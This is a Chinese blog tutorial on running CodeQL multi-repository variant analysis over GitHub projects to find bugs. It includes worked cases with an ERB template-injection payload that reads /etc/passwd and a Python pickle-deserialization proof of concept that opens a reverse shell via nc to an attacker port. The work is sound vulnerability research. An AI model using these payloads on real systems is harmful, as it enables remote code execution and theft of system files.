使用 MRVA CodeQL 对开源项目进行大规模漏洞挖掘

2023-10-18 11:12

本文主要是介绍使用 MRVA CodeQL 对开源项目进行大规模漏洞挖掘,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

1.什么是 MRVA?

CodeQL相关的资料目前已经非常多了,但是大部分都集中在介绍ql语法以及基本使用上,更多关注的是对单个项目进行分析。那么如何批量进行漏洞挖掘呢?这里介绍下MRVA。

MRVA是multi-repository variant analysis 的缩写。其实是VScode 里codeql插件的一个功能,只不过经常被大家忽视。使用MRVA可以一次性对多个GitHub仓库进行漏洞扫描并且不需要我们编译源码数据库,无疑给我们带来了极大的便利。

当添加大量GitHub仓库时,MRVA通常会比较缓慢,可以通过Github Code Search 查询敏感的sink点,缩小仓库范围,然后再将筛选出来的仓库添加到MVRVA的仓库中从而增加检测速度。如果结合官方或者自定义的ql文件,无疑会大大提高漏洞发现的概率。

2.MRVA vs CodeQL suites

MRVA 和 CodeQL suites之间有什么区别呢?MRVA 其实是建立在CodeQL suites之上的,通过结合github action 来实现,漏洞扫描动作是在GitHub官方镜像里面完成的,这些动作都是对用户透明的。下列两张图生动形象的展示了两者之间的区别。

CodeQL suite

MRVA

CodeQL suite是针对单个项目就像是鱼竿一次只能钓一条,而MRVA则像是渔网,一次可以针对多个仓库,无疑后者会节约大量时间。

3.如何使用MRVA

3.1 在VSCode中安装codeql插件

搜索并安装codeql插件

3.2 配置 Github controller

MRVA的原理是使用Github actions运行CodeQL queries,为了加快速度GitHub其实已经构建了目标数据库。因此我们需要依赖一个GitHub 仓库来完成GitHhub actions。仓库的名称不重要,但该仓库至少需要一个commit。

建立好controller 仓库后,就可以配置codeql插件了。进入VScode配置中,搜索codeql,如下,在variant analysis中配置。名称和上一步创建的保持一致即可。

4.导入GitHub仓库

在codeql插件中有几种导入仓库的方式

默认情况下有top10、top100、top1000 的仓库地址,如果使用直接勾选即可。也可以根据自己需要选择数据库,点击+号可以直接添加某个仓库,也可以根据仓库owner或者组织进行批量添加。

当选择文件夹的标志时,可以创建一个list,这里创建了一个test,在test鼠标右键可以看到支持从GitHub Code Search直接添加仓库,这样筛选出来的仓库存在漏洞的概率就更大,检测的时间也更短。

同时我们也可以直接修改配置文件,添加仓库。

5.MRVA漏洞挖掘实战

5.1服务器端模板注入 (Ruby)

我们通过服务器端模板注入漏洞为例,来测试下 MRVA。该ql已经集成进codeql suites中,
ruby/ql/src/experimental/template-injection/TemplateInjection.ql。

使用上述ql语句扫描了GitHub top1000的项目,排除误报后发现了下列项目存在漏洞:
bootstrap-ruby/bootstrap_form.


下面对漏洞进行验证:

bootstrap_form/demo/bin ❯ sudo ./rails s

执行完毕之后,demo运行在3000端口

def fragment

@erb = params[:erb]

@erb.prepend '<div class="p-3 border">'

@erb << "</div>"

load_models

render inline: @erb, layout: "application" # rubocop: disable Rails/RenderInline

end

从上面代码可知,demo应用接收了erb参数并拼接了html标签最后解析执行,从下面代码可知路由为/fragment

Dummy::Application.routes.draw do

get "fragment" => "bootstrap#fragment", as: :fragment

resources :users

root to: "bootstrap#form"

end

分析完毕代码之后,我们尝试通过如下payload 利用ssti读取passwd文件:

<%= IO.popen('cat /etc/passwd').readlines() %>

可惜的是虽然证明了上述demo确实存在漏洞,但由于该demo仅供演示,因此没有危害。但我们整个流程是走通了。

5.2不安全的反序列化 (Python)

使用默认的codeql suites的python ql文件UnsafeDeserialization.ql对GitHub top 1000项目进行扫描,发现ray项目存在漏洞。


从上述查询结果中可以发现RLlib的 PolicyServerInput 类 (
/ray/python/ray/rllib/env/policy_server_input.py)直接对用户提交的raw_body进行了反序列化操作,如下

def do_POST(self):

content_len = int(self.headers.get("Content-Length"), 0)

raw_body = self.rfile.read(content_len)

parsed_input = pickle.loads(raw_body)

经分析发现上述危险类在
/ray/rllib/examples/serving/cartpole_server.py (l.101-115)中使用

if __name__ == "__main__":

args = parser.parse_args()

ray.init()

def _input(ioctx):

if ioctx.worker_index > 0 or ioctx.worker.num_workers == 0:

return PolicyServerInput(

ioctx,

SERVER_ADDRESS,

args.port + ioctx.worker_index - (1 if ioctx.worker_index > 0 else 0),

)

启动该server并进行测试

python3 /ray/rllib/examples/serving/cartpole_server.py

poc如下,发送恶意的代码到目标端口并监听反向连接

import requests

import pickle

import os

attacker = "localhost"

attacker_port = "4444"

class RCE:

def __reduce__(self):

cmd = (f'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc {attacker} {attacker_port} > /tmp/f')

return os.system, (cmd,)

# Serialize the malicious class

pickled = pickle.dumps(RCE())

# Define the URL to which you want to send the POST request

url = "http://localhost:9900/"

headers = {

"Content-Type": "application/octet-stream", # Indicate that we are sending binary data

}

# Send the POST request with the serialized data

requests.post(url, data=pickled, headers=headers)

执行poc之后,接收到反弹shell,证明漏洞确实存在

python3 exploit.py

经过与ray官方沟通,官方认为该接口不应暴露在外,因此不认为是漏洞。经过上述例子再次证明MRVA的强大。

参考链接:

  • https://codeql.github.com/docs/codeql-for-visual-studio-code/running-codeql-queries-at-scale-with-mrva/
  • https://maikypedia.gitlab.io/posts/finding-vulns-with-mrva-codeql/

这篇关于使用 MRVA CodeQL 对开源项目进行大规模漏洞挖掘的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/232196

相关文章

Pandas使用SQLite3实战

《Pandas使用SQLite3实战》本文主要介绍了Pandas使用SQLite3实战,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学... 目录1 环境准备2 从 SQLite3VlfrWQzgt 读取数据到 DataFrame基础用法:读

JSON Web Token在登陆中的使用过程

《JSONWebToken在登陆中的使用过程》:本文主要介绍JSONWebToken在登陆中的使用过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录JWT 介绍微服务架构中的 JWT 使用结合微服务网关的 JWT 验证1. 用户登录,生成 JWT2. 自定义过滤

Java中StopWatch的使用示例详解

《Java中StopWatch的使用示例详解》stopWatch是org.springframework.util包下的一个工具类,使用它可直观的输出代码执行耗时,以及执行时间百分比,这篇文章主要介绍... 目录stopWatch 是org.springframework.util 包下的一个工具类,使用它

Java进行文件格式校验的方案详解

《Java进行文件格式校验的方案详解》这篇文章主要为大家详细介绍了Java中进行文件格式校验的相关方案,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 目录一、背景异常现象原因排查用户的无心之过二、解决方案Magandroidic Number判断主流检测库对比Tika的使用区分zip

Java使用Curator进行ZooKeeper操作的详细教程

《Java使用Curator进行ZooKeeper操作的详细教程》ApacheCurator是一个基于ZooKeeper的Java客户端库,它极大地简化了使用ZooKeeper的开发工作,在分布式系统... 目录1、简述2、核心功能2.1 CuratorFramework2.2 Recipes3、示例实践3

springboot security使用jwt认证方式

《springbootsecurity使用jwt认证方式》:本文主要介绍springbootsecurity使用jwt认证方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地... 目录前言代码示例依赖定义mapper定义用户信息的实体beansecurity相关的类提供登录接口测试提供一

go中空接口的具体使用

《go中空接口的具体使用》空接口是一种特殊的接口类型,它不包含任何方法,本文主要介绍了go中空接口的具体使用,具有一定的参考价值,感兴趣的可以了解一下... 目录接口-空接口1. 什么是空接口?2. 如何使用空接口?第一,第二,第三,3. 空接口几个要注意的坑坑1:坑2:坑3:接口-空接口1. 什么是空接

springboot security快速使用示例详解

《springbootsecurity快速使用示例详解》:本文主要介绍springbootsecurity快速使用示例,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝... 目录创www.chinasem.cn建spring boot项目生成脚手架配置依赖接口示例代码项目结构启用s

Python如何使用__slots__实现节省内存和性能优化

《Python如何使用__slots__实现节省内存和性能优化》你有想过,一个小小的__slots__能让你的Python类内存消耗直接减半吗,没错,今天咱们要聊的就是这个让人眼前一亮的技巧,感兴趣的... 目录背景:内存吃得满满的类__slots__:你的内存管理小助手举个大概的例子:看看效果如何?1.

java中使用POI生成Excel并导出过程

《java中使用POI生成Excel并导出过程》:本文主要介绍java中使用POI生成Excel并导出过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录需求说明及实现方式需求完成通用代码版本1版本2结果展示type参数为atype参数为b总结注:本文章中代码均为